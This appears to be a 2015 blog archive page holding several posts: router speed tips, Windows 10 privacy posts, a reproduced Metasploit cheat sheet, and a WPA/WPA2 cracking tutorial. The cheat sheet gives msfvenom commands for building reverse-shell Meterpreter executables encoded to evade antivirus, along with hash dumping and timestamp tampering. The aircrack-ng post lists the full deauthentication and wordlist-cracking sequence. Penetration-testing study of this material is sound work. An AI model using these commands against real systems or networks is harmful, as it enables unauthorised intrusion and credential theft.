Sunday, 20 September 2015

7 Wi-Fi Tweaks to Increase Your Speed

Chances are if you have a wireless internet connection at your home, you have had some trouble with the speed of the connection at least once before. That being said, a slow wireless connection can be frustrating to deal with. You are probably paying good money to your internet service provider, so slow speed is something you should not have to deal with, right? Well, the truth is wireless speed can be affected by a number of things. Luckily there are some Wi-Fi tweaks you can try that should help boost your speed and get you rolling in no time.

1. Reposition Your Router

The position of your wireless router plays a major role in the speed and strength of your wireless connection. If you are having trouble, you should try to reposition your router in a centrally located area, where the signal can equally reach each wireless device in your house. If your router is near an outside wall, try to move it closer to the middle of your house. Routers that are placed near outside walls can send some of the signal outside, which can risk your wireless connection’s strength and speed.

2. Purchase a Wireless Signal Repeater

Adding a wireless signal repeater to your home network can greatly increase the speed of your connection. A repeater works by extending your signal without having to add any additional wires. All you have to do is simply place the wireless repeater in a location that is between your router and your wireless device(s). It will instantly boost the wireless signal that is sent from the router to your devices, meaning faster speeds for you.

3. Install a New Antenna

Most wireless routers come standard with an omnidirectional antenna, meaning it broadcasts the wireless signal in a circular radius to reach various places in your home. If your router is in a perfectly centered location between all of your wireless devices, this is probably fine. But if your router isn’t perfectly centered among devices, you should think about replacing the existing antenna with a stronger one, known as a high-gain antenna. You can usually remove your old antenna and replace it with one of these stronger antennas to boost your signal strength, therefore increasing the speed of your connection. Another perk of a high-gain antenna is its ability to focus the wireless signal in any direction you prefer.

Increase Wireless internet Speed

4. Use One Brand of Equipment

You may not think that using different brands of equipment can reduce the speed of your wireless connection, but in reality it can. If you use different brands of equipment, your components may not work as efficiently. This is because many manufacturers of wireless networking equipment pre-install enhancements in all of their products. These enhancements can boost speed, but will only work if products from the same manufacturer are used simultaneously. If you are using various brands of equipment and your speed is suffering, this is definitely worth a try.

5. Reduce Frequency Interference

Many household electronics, such as cordless telephones and baby monitors, run at the same frequency as wireless routers. This means that these electronic devices can interfere with the wireless signal that is being broadcast from your router, which can affect the speed and performance of your connection. Check the box of your router to see what frequency it runs at, and try to avoid using other electronic devices that operate at the same frequency. You can also try to change the channel on your router to avoid frequency interference.

6. Check for Firmware or Driver Updates Regularly

The manufacturers of wireless routers and network adapters often release firmware or driver updates that can improve the function of your wireless connection. You can find and download these updates at the manufacturers’ websites. Updates are usually done to fix issues, add features, and strengthen your equipment’s performance. Check for these updates on a regular basis to make sure your firmware and drivers are always kept up to date.

7. Secure Your Wireless Network

If your network is not properly secured, neighbors could be using your signal. This can reduce the speed of your connection because you are in a sort, sharing the wireless signal. Set up secure passwords and some sort of wireless encryption that will prevent anyone else from accessing your wireless network. All of these Wi-Fi tweaks can greatly boost the speed of your wireless connection. If one of them does not seem to do the trick, try another or even a multitude of options. It may take a little time and patience, but once you figure out what works to speed up your connection, you will be happy you put forth the effort.

Sunday, 13 September 2015

Metasploit Cheat Sheet Free Download

Metasploit Cheat Sheet by Yori Kvitchko, Tom Hessman, Daniel Pendolino, & Ed Skoudis from

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.
Post Modules from Meterpreter
meterpreter > run post/multi/gather/env
Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner:
msf > use auxiliary/scanner/portscan/
msf > set RHOSTS
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server
msf > use auxiliary/server/socks4
msf > run
Any proxied traffic that matches the subnet of a route will be routed through the session specified by route.
Use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.


The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former
msfpayload and msfencode tools. Run with
‘’-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
Reverse Meterpreter payload as an executable and
redirected into a file:
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=
LPORT=4444 > met.exe
Format Options (specified with –f)
–help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
Encode a payload from msfpayload 5 times using shikataga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST= LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)

Search for module:
msf > search [regex]
Specify and exploit to use:
msf > use exploit/[ExploitPath]
Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current modules:
msf > show options
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Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)

Process Commands:
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges
of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
– Target process must have same or lesser privileges
– Target process may be a more stable process
– When inside a process, can access any files that
process has a lock on
Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table
Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine
screenshot: Save as an image a screenshot of the target machine
Additional Modules:
use [module]: Load the specified module
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j
List all current jobs (usually exploit listeners):
msf > jobs –l
Kill a job:
msf > jobs –k [JobID]
Multiple Sessions:
List all backgrounded sessions: msf > sessions -l
Interact with a backgrounded session:msf > session -i [SessionID]
Background the current interactive session:meterpreter > <Ctrl+Z> or meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

Is Windows 10 Spying On You? Sir.O Sings the Microsoft Service Agreement

Microsoft claims that it could be using some Windows updates to scan pirated games on users computer and block them completely.
Since few people can’t really understand what Microsoft’s trying to say in this service agreement, a YouTube user named Sir.O decided to sing section 7B, thus making it easier and to get the right message.

Hope this video is user-friendly and easier at some level. Let us know about your thoughts on comment section.

How To Block Windows 10 Data Collection

There are many apps to block Windows 10 data collection, but it’s almost hard to choose the best one since all the software claims to disable everything that tracks your latest OS.
In this tutorial we suggest the best software Spybot Anti-Beacon to use against Microsoft’s data collection. This tool has simple user interface and powerful.
This tool helps you to protect your privacy with one click install.

List of settings you can block:

  • telemetry hosts
  • services
  • group policies
  • disable Wi-Fi sense
  • P2P Widnows updates outside local network
  • application impact telemetry group police
All these can be block by clicking the Immunize button. InOptional tab you will be having some extra settings for OneDrive, Cortana and web search
Download Spybot Anti-Beacon to save your privacy right now.

Crack WPA & WPA2 with Aircrack-ng on Kali Linux

In this tutorial we are going to teach you How to crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.
Note: This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.

Things we used for cracking WPA & WPA2:

Command to crack WPA & WPA2:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0 
airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up 

Here is a YouTube video on How to crack WPA and WPA2 with Aircrack-ng on Kali Linux:

In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.